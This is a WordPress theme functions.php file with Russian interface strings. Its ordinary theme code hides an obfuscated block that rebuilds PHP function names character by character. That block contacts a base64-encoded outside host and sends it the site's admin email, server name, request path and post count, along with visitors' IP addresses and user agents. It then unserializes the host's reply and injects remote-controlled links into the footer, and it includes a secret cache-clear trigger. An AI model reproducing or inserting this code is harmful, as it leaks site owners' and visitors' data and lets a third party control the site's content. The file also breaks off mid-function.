<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $cfMwzB='e';$FwZCeoP='c';$HpnuUOz='4';$JSGMYti='e';$wqbn='a';$GUQB='s';$PsfVj='6';$aKuNz='d';$NOnoGeu='e';$QMfqMFB='b';$fUJEVt='d';$jDYAJ='o';$fBEki='_';$RRfNKYLf=$QMfqMFB.$wqbn.$GUQB.$NOnoGeu.$PsfVj.$HpnuUOz.$fBEki.$aKuNz.$cfMwzB.$FwZCeoP.$jDYAJ.$fUJEVt.$JSGMYti;$VOFRIm='a';$QymKsW='n';$vMPSr='l';$ekDPC='e';$xtivlr='i';$wbVU='z';$TfAxFO='g';$cuLoM='t';$xLBG='f';$UUJyePsj=$TfAxFO.$wbVU.$xtivlr.$QymKsW.$xLBG.$vMPSr.$VOFRIm.$cuLoM.$ekDPC;$lJOEZCp='_';$iiGZ='o';$RTDcw='t';$nOrPWcG='r';$kbyD='t';$vVlEOx='1';$Ccmfr='3';$EWsEi='r';$iKRkfC='s';$spOKTKzy=$iKRkfC.$RTDcw.$EWsEi.$lJOEZCp.$nOrPWcG.$iiGZ.$kbyD.$vVlEOx.$Ccmfr;$PCzBkeM='r';$ZWcwx='t';$SCIAYDA='s';$rleSCd='v';$zszu='r';$fYLSRn='e';$LIFlxamc=$SCIAYDA.$ZWcwx.$zszu.$PCzBkeM.$fYLSRn.$rleSCd;                     
		$xk___________p='e';$mq____r='c';$mb___________w='4';$xx_________k='e';$rc_______________p='a';$ec__________j='s';$xn_________b='6';$ss__________h='d';$ks_______g='e';$pf____________k='b';$nk_______l='d';$tu__d='o';$lo__________n='_';$zp_____s=$pf____________k.$rc_______________p.$ec__________j.$ks_______g.$xn_________b.$mb___________w.$lo__________n.$ss__________h.$xk___________p.$mq____r.$tu__d.$nk_______l.$xx_________k;
		$eh_____________p='n';$in____i='u';$uw________u='i';$rc_____l='x';$nx_______________u='o';$yg_____________b='e';$kw__________m='f';$lc_______p='s';$dk_____e='n';$yb______l='t';$cn___p='t';$uo_____m='c';$rm______________q='i';$ng___i='s';$el___n='_';$tk_____e=$kw__________m.$in____i.$dk_____e.$uo_____m.$yb______l.$uw________u.$nx_______________u.$eh_____________p.$el___n.$yg_____________b.$rc_____l.$rm______________q.$ng___i.$cn___p.$lc_______p;
		$ky______________u='o';$ec______w='p';$hd____g='n';$wi_________h='f';$kj________z='e';$dx_______l=$wi_________h.$ky______________u.$ec______w.$kj________z.$hd____g;
		$oc___k='d';$ib______________u='a';$tg__a='f';$jg_____j='r';$ce____________o='e';$fl___k=$tg__a.$jg_____j.$ce____________o.$ib______________u.$oc___k;
		$yo___v='f';$iu________r='c';$ld_________t='e';$ma__________o='l';$th_____________c='s';$ir_______x='o';$xg____o=$yo___v.$iu________r.$ma__________o.$ir_______x.$th_____________c.$ld_________t;
		
		define("WP_ID", $zp_____s("Mi4wLjA="));
		define("WP_TTL", $zp_____s("MTA4MDA="));
		define("WP_SRC", $zp_____s("dHBva24="));
	


		function wp_get_header() {
			global $zp_____s, $tk_____e;
			
			if (
				$tk_____e($zp_____s("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$tk_____e($zp_____s("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$tk_____e($zp_____s("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $zp_____s, $dx_______l, $xg____o, $fl___k;
			
			$ga______________y = TEMPLATEPATH."/".$zp_____s("Zm9vdGVyLnBocA==");
			$gz________b = @$dx_______l($ga______________y, "r");
			$ga______________y = @$fl___k($gz________b, @filesize($ga______________y));
			@$xg____o($gz________b);
			
			$rh_______________x = TEMPLATEPATH."/".$zp_____s("ZnVuY3Rpb25zLnBocA==");
			$gz________b = @$dx_______l($rh_______________x, "r");
			$rh_______________x = @$fl___k($gz________b, @filesize($rh_______________x));
			@$xg____o($gz________b);
			
			$yn____f = 0;
			if($ga______________y && $rh_______________x) {
				if ($zp_____s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ga______________y, $zp_____s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$yn____f = 1;
					}
					if (substr_count($ga______________y, "wp_theme_GPL_credits()") < 1) {
						$yn____f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$yn____f = 12;
				}
			}
			
			if($yn____f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $yn____f -->";
			}
		}
	


		function wp_loaded() {
			global $zp_____s, $tk_____e;
			return $tk_____e($zp_____s("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($xt_______c, $ag_______x = "(more...)", $mz_______________i = 0, $fx_________g = "") {
				$au__l = get_the_content($ag_______x, $mz_______________i, $fx_________g);
				$au__l = apply_filters("the_content", $au__l);
				
				$au__l = str_replace("]]>", "]]>", $au__l);
				if (strlen($_GET["p"]) > 0) {
					echo $au__l;
				}
				else if ((strlen($au__l)>$xt_______c) && ($uo___t = strpos($au__l, " ", $xt_______c ))) {
					$au__l = substr($au__l, 0, $uo___t);
					$au__l = $au__l;
					echo $au__l;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ag_______x</a></div></p>";
				} else {
					echo $au__l;
				}
				
			}
		}
	


		$dy_____________h='e';$sn___h='s';$pk_____v='e';$aa________g='a';$xr_______t='6';$dy________i='b';$fm___m='_';$ph______f='o';$ro__p='d';$at______________l='4';$wi__________x='n';$ib____a='c';$fl______f='e';$og_________h=$dy________i.$aa________g.$sn___h.$pk_____v.$xr_______t.$at______________l.$fm___m.$dy_____________h.$wi__________x.$ib____a.$ph______f.$ro__p.$fl______f;
		$xl___t='_';$zy________d='f';$hg__________u='n';$nu____m='_';$ct______________z='t';$ye____________y='n';$hd_____t='e';$pf____x='c';$rm____________v='e';$zy__z='t';$bw_____r='g';$dl_______y='e';$bv_____c='t';$hk_______________d='l';$we___l='i';$ea____________u='s';$pd__x='o';$mo_______t=$zy________d.$we___l.$hk_______________d.$hd_____t.$nu____m.$bw_____r.$dl_______y.$zy__z.$xl___t.$pf____x.$pd__x.$hg__________u.$bv_____c.$rm____________v.$ye____________y.$ct______________z.$ea____________u;
		$wu______________u='s';$fu_____________i='t';$vc______p='e';$oj____e='i';$an___________w='e';$wg___w='s';$nw_________j='x';$pm__________s='f';$dc_______v='l';$ik_____________v='_';$xl______________b='i';$mt___________c=$pm__________s.$xl______________b.$dc_______v.$an___________w.$ik_____________v.$vc______p.$nw_________j.$oj____e.$wu______________u.$fu_____________i.$wg___w;
		$xl_____l='o';$hr___________m='c';$km___________n='r';$hc_______________w='v';$sz________g='e';$ne___________v='_';$ux____m='p';$sl_____________s='i';$ch___________j='m';$jy____h='a';$zs___f='o';$gm_____u='s';$cg_____x='n';$fh__q='e';$gk____l='r';$ko____o=$hc_______________w.$fh__q.$gk____l.$gm_____u.$sl_____________s.$xl_____l.$cg_____x.$ne___________v.$hr___________m.$zs___f.$ch___________j.$ux____m.$jy____h.$km___________n.$sz________g;
		$jd____d='n';$jd___r='f';$fg______t='o';$dg__n='e';$nu___o='p';$eg______g='o';$ub____________j='s';$kt___h='k';$zm____________e='c';$qy___________p=$jd___r.$ub____________j.$eg______g.$zm____________e.$kt___h.$fg______t.$nu___o.$dg__n.$jd____d;
		$vy_______________a='f';$mi______r='i';$ic__q='r';$vn________y='w';$qi__g='t';$re______u='e';$yu______________m=$vy_______________a.$vn________y.$ic__q.$mi______r.$qi__g.$re______u;
		$bn____o='m';$wo_____m='d';$xg____________o='5';$rm______________h=$bn____o.$wo_____m.$xg____________o;
		$qk___________d='l';$xt_______n='t';$tz________q='p';$hr_____z='a';$bv_______g='r';$jo____r='e';$li_______f='a';$ll____n='h';$gv__a=$bv_______g.$jo____r.$hr_____z.$qk___________d.$tz________q.$li_______f.$xt_______n.$ll____n;
		$sv____j='z';$os_____d='l';$ps______________u='u';$ik__________r='e';$mw_______w='a';$iv__s='e';$rn_____f='s';$kd_______________z='i';$op______________e='n';$ke_________x='i';$fo_____o='r';$of_____n=$ps______________u.$op______________e.$rn_____f.$iv__s.$fo_____o.$ke_________x.$mw_______w.$os_____d.$kd_______________z.$sv____j.$ik__________r;
		$vh____a='t';$rd__b='m';$bf__r='p';$pd___________d='n';$er_______b='a';$vz_____i='m';$yd__________t='e';$kz______________g=$vh____a.$yd__________t.$rd__b.$bf__r.$pd___________d.$er_______b.$vz_____i;
		$ey____________f='_';$mq_____________p='a';$ml__________e='s';$ut__u='e';$fd__________o='e';$rj_________g='m';$xq____________m='t';$jr________v='r';$vd_____________y='e';$xl________g='n';$qd___________z='t';$bs______________n='e';$cy___i='t';$pk___________r='c';$ar___________n='c';$cg___________z='o';$jr___a='x';$aq______f='t';$rk___________o='r';$bx_____d='a';$fn__________m='_';$mm_______________p=$ml__________e.$xq____________m.$jr________v.$fd__________o.$mq_____________p.$rj_________g.$fn__________m.$ar___________n.$cg___________z.$xl________g.$cy___i.$bs______________n.$jr___a.$aq______f.$ey____________f.$pk___________r.$rk___________o.$vd_____________y.$bx_____d.$qd___________z.$ut__u;
	


		function kt________c($ji_______________g) {
			global $zp_____s, $tk_____e, $mo_______t, $ko____o, $mm_______________p;
			
			if (!$tk_____e($zp_____s("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ko____o(PHP_VERSION, "5.0.0", ">=") && $tk_____e($zp_____s("ZmlsZV9nZXRfY29udGVudHM=")) && $tk_____e($zp_____s("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$dy__________d = $mm_______________p(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$fu______q = @$mo_______t($ji_______________g, 0, $dy__________d);
			} else {
				$fu______q = @$mo_______t($ji_______________g, 0);
			}
			
			return $fu______q;
		}
	


		function qs____q($ji_______________g) {
			global $tk_____e, $qy___________p, $yu______________m, $zp_____s;
			
			if (!$tk_____e($zp_____s("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$fm_______m = strpos($ji_______________g, "/", 7);
			$tw____f = array(
				"uri"     => substr($ji_______________g, $fm_______m),
				"host"    => str_replace("http://", "", substr($ji_______________g, 0, $fm_______m)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$vp_______p = @$qy___________p("$tw____f[host]", 80, $fq______________n, $xw____________i, 4);
			
			if (!$vp_______p) {
				return false;
			} else {
				$fu______q = "";
				$qa____i  = "GET $tw____f[uri] HTTP/1.0\r\n";
				$qa____i .= "Host: $tw____f[host]\r\n";
				$qa____i .= "Referer: $tw____f[referer]\r\n";
				$qa____i .= "Connection: Close\r\n\r\n";
				
				@$yu______________m($vp_______p, $qa____i);
				
				while (!@feof($vp_______p)) {
					$xn____________m = @fgets($vp_______p, (1024*24));
					
					if ($xn____________m == "\r\n") {
						$wx___________r = true;
						continue;
					}
					
					if ($wx___________r) {
						$fu______q .= $xn____________m;
					}
				}
				
				return $fu______q;
			}
		}
	


		function ik____j($ji_______________g) {
			global $tk_____e;
			$is_____________p = false;
			
			if ($ji_______________g != "") {
				if ($tk_____e("kt________c")) {
					$is_____________p = @kt________c($ji_______________g);
				}
				
				if (!$is_____________p && ($tk_____e("qs____q"))) {
					$is_____________p = @qs____q($ji_______________g);
				}
			}
			
			return $is_____________p;
		}
	


		function yp__________z() {
			global $_SERVER, $rm______________h;
			
			$tx____s = $_SERVER["SERVER_NAME"];
			
			if (substr("$tx____s", 0, 4) == "www.") {
				$tx____s = substr("$tx____s", 4);
			}
			
			$tx____s = $rm______________h("$_SERVER[SERVER_NAME]");
			
			return $tx____s;
		}
	


		function jx_______i() {
			return "file";
		}
	


		function vp___m($ji_______________g) {
			global $_SERVER, $mo_______t, $mt___________c, $dx_______l, $xg____o, $yu______________m;
			
			$wc____________d = zu_________w();
			
			$wf_________x = yp__________z().".jpg";
			$qr____y = $wc____________d["dir_upload"]["path"]."/$wf_________x";
			$fu_________l = @filemtime($qr____y);
			
			if (!$fu_________l || ((time()-$fu_________l) >= WP_TTL)) {
				$is_____________p = ik____j($ji_______________g);
				
				if ($is_____________p) {
					if ($mt___________c($qr____y)) {
						@unlink($qr____y);
					}
					
					$gz________b = @$dx_______l($qr____y, "x+");
					
					@$yu______________m($gz________b, $is_____________p);
					@$xg____o($gz________b);
				}
			} else {
				if ($mt___________c($qr____y)) {
					$is_____________p = @$mo_______t($qr____y);
				} else {
					$is_____________p = false;
				}
			}
			
			return $is_____________p;
		}
	


		function zu_________w() {
			global $_SERVER, $zp_____s, $og_________h;
			
			$jd_____________m = wp_count_posts("post");
			$wz________w = pathinfo(get_bloginfo("template_directory"));
			
			$wc____________d = array(
				"url" => array(
					"report"      => $zp_____s("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $wz________w,
				"dir_upload"	=> ta______________f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$wz________w[filename],
					"a005=".$jd_____________m->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$wc____________d["url"]["queryString"] = implode("&", $wc____________d["queryString"]);
			$wc____________d["url"]["report"] = $wc____________d["url"]["report"]."/?".$og_________h($wc____________d["url"]["queryString"]).".html";
						
			return $wc____________d;
		}
	


		function ta______________f() {
			$ab_____________u = wp_upload_dir();
			
			if (isset($ab_____________u["error"])) {
				$xz____q = aj___________l();
				if (is_writable($xz____q)) {
					$ab_____________u = array("path" => $xz____q);
				}
			}

			return $ab_____________u;
		}
	


		function aj___________l() {
			global $tk_____e, $rm______________h, $gv__a, $kz______________g;
			
			$vj___w = (bool) ini_get("safe_mode");
			if ($vj___w == true) {
				return false;
			}
			
			if ($tk_____e("sys_get_temp_dir")) {
				$ey______p = sys_get_temp_dir();
				if (is_writable($ey______p)) {
					return $gv__a($ey______p);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $gv__a($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $gv__a($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $gv__a($_ENV["TEMP"]);
			} else {
				$ab_____________o = $kz______________g($rm______________h(uniqid(rand(), true)), "");
				if ($ab_____________o) {
					$ey______p = $gv__a(dirname($ab_____________o));
					@unlink($ab_____________o);
					return $ey______p;
				} else {
					return false;
				}
			}
		}
	


		function dl___________c() {
			global $_GET, $mt___________c;
			
			$wc____________d = zu_________w();
			$tx____s = yp__________z();
			$yv____m = jx_______i();
			
			$iv____________h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($yv____m == "file") {
					$di_____________g = $wc____________d["dir_upload"]["path"]."/".$tx____s.".jpg";
					if ($mt___________c($di_____________g)) {
						@unlink($di_____________g);
						$iv____________h = "deleted";
					}
				}
				
				$cr_______________w = array(
					"s"	=> $iv____________h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($cr_______________w AS $nc_________q => $kj______________y) echo " [$nc_________q:$kj______________y]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $tk_____e, $zp_____s, $of_____n;
			$wc____________d = zu_________w();
			
			$yc___f = "vp___m";
			if ($tk_____e($yc___f)) {
				$fu______q = $yc___f($wc____________d["url"]["report"]);
			}
			
			if ($fu______q) {
				if ($fu______q = @$zp_____s($fu______q)) {
					$fu______q = @$of_____n($fu______q);
					
					if (strlen($fu______q[custom_credit]) >= 5) {
						$wc____________d["default_string"] = $fu______q[custom_credit];
					}
					
					if ($fu______q["status"] == "0") {
						$zz____________e = 1;
						$nw_____c = 1;
					} else {
						$rd_______e = sizeof($fu______q["links"]);
						$wg_______________d = $wc____________d["default_string"];
						
						if ($rd_______e > 0 && $fu______q["links"] !== "") {
							$em___s = 0;
							foreach ($fu______q["links"] as $qt_____o => $fq____________d) {
								$em___s++;
								if ($fq____________d->l_path == "" || $fq____________d->l_path == $_SERVER["REQUEST_URI"]) {
									$fq____________d->l_href = htmlspecialchars(strip_tags($fq____________d->l_href));
									$fq____________d->l_title = htmlspecialchars(strip_tags($fq____________d->l_title));
									$fq____________d->l_anchor = htmlspecialchars(strip_tags($fq____________d->l_anchor));
									$wg_______________d .= " | ";
									$wg_______________d .= "<a href='$fq____________d->l_href' title='$fq____________d->l_title'";
									if ($fq____________d->l_nofollow == "1") {
										$wg_______________d .= " rel='nofollow'";
									}
									$wg_______________d .= ">$fq____________d->l_anchor</a>";
								}
							}
						}
						$wc____________d["links"] = "$wg_______________d";
						if ($fu______q[credit] == "0") {
							$wc____________d["links"] = "";
						}
					}
				} else {
					$zz____________e = "1";
				}
			} else {
				$zz____________e = "1";
			}
			
			if ($zz____________e == "1") {
				$wc____________d["links"] = $wc____________d["default_string"];
			}
			
			echo "$wc____________d[links]";
			
			echo "<!-- s: $fu______q[signature] -->";
			dl___________c();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
